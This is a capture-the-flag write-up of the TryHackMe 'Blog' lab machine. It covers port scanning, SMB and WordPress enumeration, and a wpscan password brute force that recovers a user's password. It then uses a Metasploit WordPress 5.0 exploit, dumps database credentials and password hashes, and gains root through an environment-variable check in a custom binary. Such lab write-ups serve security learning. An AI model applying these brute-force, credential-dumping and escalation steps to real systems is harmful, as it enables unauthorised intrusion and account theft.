CTF-Writeups/TryHackMe/Blog.md
2020-11-12 02:57:42 +05:00

15 KiB

TryHackMe-Blog

NMAP

Nmap scan report for 10.10.62.12
Host is up (0.17s latency).                                                                                                                         
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION                                         
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                     
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_  256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
| http-robots.txt: 1 disallowed entry  
|_/wp-admin/                     
|_http-server-header: Apache/2.4.29 (Ubuntu)          
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
                                     
Host script results:
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:                                                                                                                                 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)                    
|   Computer name: blog                                                   
|   NetBIOS computer name: BLOG\x00                                       
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2020-11-11T18:34:52+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-11T18:34:52
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds

PORT 139/445 (SMB)

We know that there are smb shares on this box so let's see which shares we can access

Let's grab the two photos from here and save it on our local machine

smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (34.8 KiloBytes/sec) (average 34.8 KiloBytes/sec)
smb: \> get check-this.png
getting file \check-this.png of size 3082 as check-this.png (4.5 KiloBytes/sec) (average 22.3 KiloBytes/sec)
smb: \> 

Now we will see that there is a qr-image so use zbarimg to see what text we get from it

root@kali:~/TryHackMe/Medium/Blog# zbarimg check-this.png 
QR-Code:https://qrgo.page.link/M6dE

We will get a link that points to a video on youtube Billy Joel - We Didn't Start the Fire (Official Video) .

This seems like a rabbithole ....

root@kali:~/TryHackMe/Medium/Blog# steghide --extract -sf Alice-White-Rabbit.jpg 
Enter passphrase: 
wrote extracted data to "rabbit_hole.txt".
root@kali:~/TryHackMe/Medium/Blog# cat rabbit_hole.txt 
You've found yourself in a rabbit hole, friend.
root@kali:~/TryHackMe/Medium/Blog# 

And I was right being in the wrong path :D

PORT 80

Moving on to web page

Now your seeing this page like this because we have to add blog.thm into our /etc/hosts/

Now it's loading properly

Looking at robots.txt

I found a wordpress login page

Gobuster

gobuster dir -u http://blog.thm -w /usr/share/wordlists/big.txt

2020/11/11 23:56:33 Starting gobuster
===============================================================
/! (Status: 301)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/0000 (Status: 301)
/2020 (Status: 301)
/admin (Status: 302)
/asdfjkl; (Status: 301)
/atom (Status: 301)
/dashboard (Status: 302)
/embed (Status: 301)
/favicon.ico (Status: 200)
/feed (Status: 301)
/fixed! (Status: 301)
Progress: 9204 / 20470 (44.96%

I didn't find anything interesting with gobuster so doing something with wordpress login page is the only way in

WPSCAN

I used wpscan to enumerate for users and wordpress version

oot@kali:~/TryHackMe/Medium/Blog# wpscan -e --url 10.10.62.12            
_______________________________________________________________                                                                                     
         __          _______   _____                                                                                                                
         \ \        / /  __ \ / ____|                                 
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                              
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                               
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                              
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                              
                                                                          
         WordPress Security Scanner by the WPScan Team                                                                                              
                         Version 3.8.4                                                                                                              
       Sponsored by Automattic - https://automattic.com/                                                                                            
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.62.12/ [10.10.62.12]
[+] Started: Thu Nov 12 00:15:15 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://10.10.62.12/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.62.12/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
[i] User(s) Identified:

[+] bjoel
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] kwheel
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
 | Found By: Rss Generator (Aggressive Detection)

[+] Billy Joel
 | Found By: Rss Generator (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Nov 12 00:17:18 2020
[+] Requests Done: 3086
[+] Cached Requests: 30
[+] Data Sent: 762.895 KB
[+] Data Received: 1.192 MB
[+] Memory used: 230.801 MB
[+] Elapsed time: 00:02:03

And I found two users bjoel and kwheel lets put this in a text file bruteforce thier passwords

wpscan --url http://blog.thm -U users.txt  -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________                                                                                     
         __          _______   _____
         \ \        / /  __ \ / ____|                   
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                              
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                               
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                              
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                              
                                                                          
         WordPress Security Scanner by the WPScan Team                    
                         Version 3.8.4           
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                    
_______________________________________________________________                                                                                     
                                                                          
[+] URL: http://blog.thm/ [10.10.62.12]                                   
[+] Started: Thu Nov 12 00:27:33 2020
                                                                          
Interesting Finding(s):                                                   
                                                                          
[+] Headers                                                                                                                                         
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)       
 | Found By: Headers (Passive Detection)              
 | Confidence: 100%
                                                                          
[+] http://blog.thm/robots.txt                                            
 | Interesting Entries:
 [+] Enumerating All Plugins (via Passive Methods)                         
                                     
[i] No plugins Found.                                                     
                                                                          
[+] Enumerating Config Backups (via Passive and Aggressive Methods)       
 Checking Config Backups - Time: 00:00:01 <=======================================================================> (21 / 21) 100.00% Time: 00:00:01
                                                                          
[i] No Config Backups Found.                                              
                                     
[+] Performing password attack on Xmlrpc against 2 user/s                 
[SUCCESS] - kwheel / cutiepie1                                            
Trying bjoel / heaven1 Time: 00:07:54 <                                                                    > (6030 / 28691649)  0.02%                                      

It took some time but we got khweel's passwords

And now we logged in as khweel in wordpress

Then I did a litte resarch on goole if there's an exploit available for wordpress 5.0

So there's an exploit available for it on metasploit

You could also search for it on searchsploit and it's going to show up as it's on exploit-db

But I will be using metasploit because a tool is available for you why not use it :D

I tried to use it but it kept failing, after quite sometime and restarted metasploit and then the exploit worked

I didn't find anythin in bjoel's home directory I quickly ran linpeas

These were the things I found out of linpeas

define('DB_NAME', 'blog');                                                                                                                          
define('DB_USER', 'wordpressuser');                                                                                                                 
define('DB_PASSWORD', 'LittleYellowLamp90!@');                                                                                                      
define('DB_HOST', 'localhost');    

Now a mysql database must be ruuning on localhost so lets try to login with these credentials

As we can see DB_NAME is blog

mysql> use blog
use blog
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_blog        |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> 

I ran command to select all entries in wp_users

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key | user_status | display_name  |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+
|  1 | bjoel      | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel         | nconkl1@outlook.com          |          | 2020-05-26 03:52:26 |                     |           0 | Billy Joel    |
|  3 | kwheel     | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel        | zlbiydwrtfjhmuuymk@ttirv.net |          | 2020-05-26 03:57:39 |                     |           0 | Karen Wheeler |
+----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+

Let's try cracking these hashes

But this was useless as we already got that password

I then tried to run /usr/sbin/checker and it looked like it is customized

This looks like Buffer Overflow exploitation

This tells that there's variable that is holds bash variable $admin's value and it's comparing it wheather it's empty or not so you can see that on null value it would terminate so we need to set the value true

www-data@blog:/media$ export admin=true
export admin=true
www-data@blog:/media$ echo $admin
echo $admin
true
www-data@blog:/media$ /usr/sbin/checker
/usr/sbin/checker
root@blog:/media#